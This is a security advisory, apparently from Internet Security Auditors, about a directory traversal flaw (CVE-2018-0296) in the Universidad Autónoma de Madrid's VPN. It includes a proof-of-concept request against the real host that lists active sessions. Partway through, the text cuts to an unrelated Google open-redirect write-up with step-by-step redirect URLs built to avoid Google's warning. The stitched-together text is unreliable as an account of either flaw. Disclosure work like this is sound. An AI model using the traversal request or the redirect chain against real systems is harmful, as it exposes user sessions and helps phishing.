2018-004: Traversal Directory en VPN de la UAM (Universidad Autónoma de Madrid)

Original release date: 09/08/2018
Last revised: 09/08/2018
Discovered by: Jorge Lajara
Severity: 5.0 CVSSv2
Vector: (AV:N/AC:L/Au:N/C:N/I:N/A:P)

BACKGROUND

The Remote Access Service (VPN) of the UAM (Universidad Autónoma de Madrid) is vulnerable to CVE-2018-0296.

DESCRIPTION

The vulnerability is due to lack of proper input validation of the HTTP URL. An attacker could exploit this vulnerability by sending a crafted HTTP request to an affected device. An exploit could allow the attacker to cause a DoS condition or unauthenticated disclosure of information. This vulnerability applies to IPv4 and IPv6 HTTP traffic.

PROOF OF CONCEPT

1) Navigate to https://vpn.uam.es/+CSCOE+/logon.html#form_title_text
2) Do a Request to https://vpn.uam.es/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions/ to list active sessions.
3) Check the response.

When a user search an image, generates a link as the following:

https://www.google.com/url?sa=i&url=https%3A%2F%2Felpais.com%2Felpais%2F2017%2F02%2F13%2Fciencia%2F1486986287_013868.html&psig=AOvVaw32qmRyOt4_pkNDMqoVlPeb&ust=1583227169251000&source=images&cd=vfe&ved=0CAIQjRxqFwoTCOjR6_m6--cCFQAAAAAdAAAAABAE

The "url" parameter is not properly validated, so an open redirect can be exploited through this parameter.

Only this parameter is mandatory, so we can exclude some parameters in the GET request because not affect the expected results:

https://www.google.com/url?&url=

How to reproduce the vulnerability:

1. Select the malicious URL
For example:
https://www.isecauditors.com

2. Create the URL redirection to avoid the Google alert message

https://translate.google.com/translate?sl=auto&tl=en&u=

For example:

https://translate.google.com/translate?sl=auto&tl=en&u=www.isecauditors.com

3. Encode the URL redirection

For that, we can use some service as "https://meyerweb.com/eric/tools/dencoder/".

For example:

https%3A%2F%2Ftranslate.google.com%2Ftranslate%3Fsl%3Dauto%26tl%3Den%26u%3Dwww.isecauditors.com

4. Create the final URL without Google alert

https://www.google.com/url?sa=i&url=https%3A%2F%2Ftranslate.google.com%2Ftranslate%3Fsl%3Dauto%26tl%3Den%26u%3Dwww.isecauditors.com

BUSINESS IMPACT

An attacker can cause a denial of service or optain arbitrary information through directory traversal techniques.

SYSTEMS AFFECTED

https://vpn.uam.es/+CSCOE+/logon.html#form_title_text

SOLUTION

-

REVISION HISTORY

09/08/2018 : Initial release

DISCLOSURE TIMELINE

  • 27/07/2018 : Vulnerability acquired by Internet Security Auditors (www.isecauditors.com).
  • 27/07/2018 : Contact with UAM Security Team.
  • 07/08/2018 : Vulnerability fixed by UAM Security Team.

REFERENCES

Consult these external references for further information:

LEGAL NOTICES

The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Internet Security Auditors accepts no responsibility for any damage caused by the use or misuse of this information.

ABOUT

Internet Security Auditors is a Spain and Colombia based company leader in web application testing, network security, penetration testing, security compliance implementation and assessing. Our clients include some of the largest companies in areas such as finance, telecommunications, insurance, ITC, etc. We are vendor independent provider with a deep expertise since 2001. Our efforts in R&D include vulnerability research, open security project collaboration and whitepapers, presentations and security events participation and promotion. For further information regarding our security services, contact us.